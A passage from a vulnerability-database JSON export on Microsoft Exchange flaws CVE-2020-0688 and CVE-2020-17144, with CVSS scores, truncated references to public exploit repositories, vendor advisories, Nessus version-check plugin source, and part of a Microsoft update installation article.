"NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-17T12:41:51", "type": "githubexploit", "title": "Exploit for Use of Hard-coded Credentials in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-08-19T10:39:41", "id": "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:29:25", "description": "# CVE-2020-0688\r\n\r\nA remote code execution vulnerability exists ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-04T10:48:40", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-10-13T07:24:05", "id": "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:30:16", "description": "# ecp_slap\nThis proof-of-concept for [CVE-2020-0688](https://cve...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-23T01:18:13", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2022-03-25T01:04:55", "id": "8C937DCD-4090-5A44-9361-4D9ECF545843", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:46:03", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-28T16:04:30", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-12-15T14:38:28", "id": "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:35:26", "description": "# CVE-2020-0688 Scanner\nThis is a little dirty Script to Check f...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-27T23:55:04", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-12-15T14:38:28", "id": "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:38", "description": "A memory corruption vulnerability exists in Microsoft Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Memory Corruption (CVE-2020-17144)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2020-12-08T00:00:00", "id": "CPAI-2020-1252", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:40:35", "description": "A remote code execution vulnerability exists in Microsoft Exchange Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-01T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2020-0688)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-05-01T00:00:00", "id": "CPAI-2020-0104", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-02-10T14:54:59", "description": "The Microsoft Exchange Server installed on the remote host is missing a security update. It is, therefore, affected by a vulnerability:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. (CVE-2020-17144)", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "Security Update for Microsoft Exchange Server 2010 SP 3 (December 2020)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS20_DEC_EXCHANGE_2010.NASL", "href": "https://www.tenable.com/plugins/nessus/143566", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143566);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-17144\");\n script_xref(name:\"MSKB\", value:\"4593467\");\n script_xref(name:\"MSFT\", value:\"MS20-4593467\");\n script_xref(name:\"IAVA\", value:\"2020-A-0554-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-047A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0138\");\n\n script_name(english:\"Security Update for Microsoft Exchange Server 2010 SP 3 (December 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing a security update. It is, therefore, affected by a vulnerability:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. (CVE-2020-17144)\");\n # https://support.microsoft.com/en-us/help/4593467/description-of-the-security-update-for-microsoft-exchange-server-2010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?541b9bde\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security update to address this issue:\n -KB4593467\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17144\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2010',\n 'min_version': '14.3.0.0',\n 'fixed_version': '14.03.509.0'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS20-12',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-20T15:36:06", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in Microsoft Exchange Server. An attacker who successfully exploited this vulnerability could gain the same rights as any other user of the Exchange server. This could allow the attacker to perform activities such as accessing the mailboxes of other users. Exploitation of this vulnerability requires Exchange Web Services (EWS) to be enabled and in use in an affected environment.\n (CVE-2020-0692)\n\n - A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user. An attacker could then install programs; view, change, or delete data; or create new accounts. Exploitation of the vulnerability requires that a specially crafted email be sent to a vulnerable Exchange server. The security update addresses the vulnerability by correcting how Microsoft Exchange handles objects in memory.\n (CVE-2020-0688)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T00:00:00", "type": "nessus", "title": "Security Updates for Exchange (February 2020)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-0692"], "modified": "2023-01-19T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS20_FEB_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/133617", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133617);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\"CVE-2020-0688\", \"CVE-2020-0692\");\n script_xref(name:\"MSKB\", value:\"4536987\");\n script_xref(name:\"MSKB\", value:\"4536988\");\n script_xref(name:\"MSKB\", value:\"4536989\");\n script_xref(name:\"MSFT\", value:\"MS20-4536987\");\n script_xref(name:\"MSFT\", value:\"MS20-4536988\");\n script_xref(name:\"MSFT\", value:\"MS20-4536989\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0122\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0017\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0019\");\n\n script_name(english:\"Security Updates for Exchange (February 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Microsoft Exchange Server. An attacker who successfully\n exploited this vulnerability could gain the same rights\n as any other user of the Exchange server. This could\n allow the attacker to perform activities such as\n accessing the mailboxes of other users. Exploitation of\n this vulnerability requires Exchange Web Services (EWS)\n to be enabled and in use in an affected environment.\n (CVE-2020-0692)\n\n - A remote code execution vulnerability exists in\n Microsoft Exchange software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the System user. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts. Exploitation of the\n vulnerability requires that a specially crafted email be\n sent to a vulnerable Exchange server. The security\n update addresses the vulnerability by correcting how\n Microsoft Exchange handles objects in memory.\n (CVE-2020-0688)\");\n # https://support.microsoft.com/en-us/help/4536987/security-update-for-exchange-server-2019-and-2016\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cac6add1\");\n # https://support.microsoft.com/en-us/help/4536988/description-of-the-security-update-for-microsoft-exchange-server-2013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dce9375f\");\n # https://support.microsoft.com/en-us/help/4536989/security-update-for-exchange-server-2010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b23bced2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB4536987\n -KB4536988\n -KB4536989\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0688\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exchange Control Panel ViewState Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2010',\n 'min_version': '14.3.0.0',\n 'fixed_version': '14.03.496.0',\n 'kb': '4536989'\n },\n {\n 'product' : '2013',\n 'unsupported_cu' : 21,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.6',\n 'kb': '4536988'\n },\n {\n 'product' : '2013',\n 'unsupported_cu' : 21,\n 'cu' : 22,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.6',\n 'kb': '4536988'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 15,\n 'min_version': '15.01.1913.0',\n 'fixed_version': '15.01.1913.7',\n 'kb': '4536987'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 14,\n 'min_version': '15.01.1847.0',\n 'fixed_version': '15.01.1847.7',\n 'kb': '4536987'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 2,\n 'cu' : 3,\n 'min_version': '15.02.464.0',\n 'fixed_version': '15.02.464.11',\n 'kb': '4536987'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 2,\n 'cu' : 4,\n 'min_version': '15.02.529.0',\n 'fixed_version': '15.02.529.8',\n 'kb': '4536987'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS20-02',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-02-17T14:26:27", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user. An attacker could then install programs; view, change, or delete data; or create new accounts.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "nessus", "title": "Microsoft Exchange Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-0692"], "modified": "2020-03-06T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "701277.PRM", "href": "https://www.tenable.com/plugins/nnm/701277", "sourceData": "Binary data 701277.prm", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2022-08-24T11:31:01", "description": "None\nThis update rollup is a security update that provides a security advisory in Microsoft Exchange. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2020-17144 | Microsoft Exchange Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-17144>)\n\n## Known issues in this security update\n\n * When you try to manually install this security update by double-clicking the update file (.msp) to run it in \"Normal mode\" (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. This issue occurs on servers that are using user account control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.To avoid this issue, follow these steps to manually install this security update:\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\nThis issue does not occur when you install the update through Microsoft Update.\n * Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to its usual state. To fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\\(v=ws.10\\).aspx>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4593467>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * [Download Update Rollup 31 for Exchange Server 2010 SP3 (KB4536989)](<http://www.microsoft.com/download/details.aspx?FamilyID=565a516b-f84f-4aff-ba8c-1c57c378b418>)\n\n## Update detail information for Exchange Server 2010 SP3\n\n### Installation instructions for Exchange Server 2010 SP3\n\nLearn more about [how to install the latest update rollup for Exchange Server 2010](<http://technet.microsoft.com/library/ff637981.aspx>).Also, learn about the following update installation scenarios.\n\n## \n\n__\n\nInstall the update on computers that aren't connected to the internet\n\nWhen you install this update rollup on a computer that isn't connected to the internet, you may experience a long installation time. Additionally, you may receive the following message:\n\nCreating Native images for .Net assemblies.\n\nThis issue is caused by network requests to connect to the following website: \n[http://crl.microsoft.com/pki/crl/products/CodeSigPCA.crl](<http://crl.microsoft.com/pki/crl/products/codesigpca.crl>) \n \nThese network requests are attempts to access the certificate revocation list for each assembly that native image generation (NGen) compiles to native code. However, because the server that's running Exchange Server isn't connected to the internet, each request must wait to time out before the process can continue. \n \nTo fix this issue, follow these steps: \n\n\n 1. In Internet Explorer, select **Internet Options** on the **Tools** menu, and then select **Advanced**.\n 2. In the **Security** section, clear the **Check for publisher's certificate revocation** check box, and then select **OK**. \n \n**Note** Clear this security option only if the computer is in a tightly-controlled environment. \n 3. When the Setup process is finished, select the **Check for publisher's certificate revocation** check box again.\n\n## \n\n__\n\nInstall the update on computers that have customized Outlook Web App files\n\n**Important **Before you apply this update rollup, make a backup copy of any [customized Outlook Web App](<http://technet.microsoft.com/library/ee633483\\(exchg.140\\).aspx>) files. \n \nWhen you apply an update rollup package, the update process updates the Outlook Web App files, if this is required. Therefore, any customizations to the Logon.aspx file or to other Outlook Web App files are overwritten, and you must re-create the Outlook Web App customizations in Logon.aspx.\n\n## 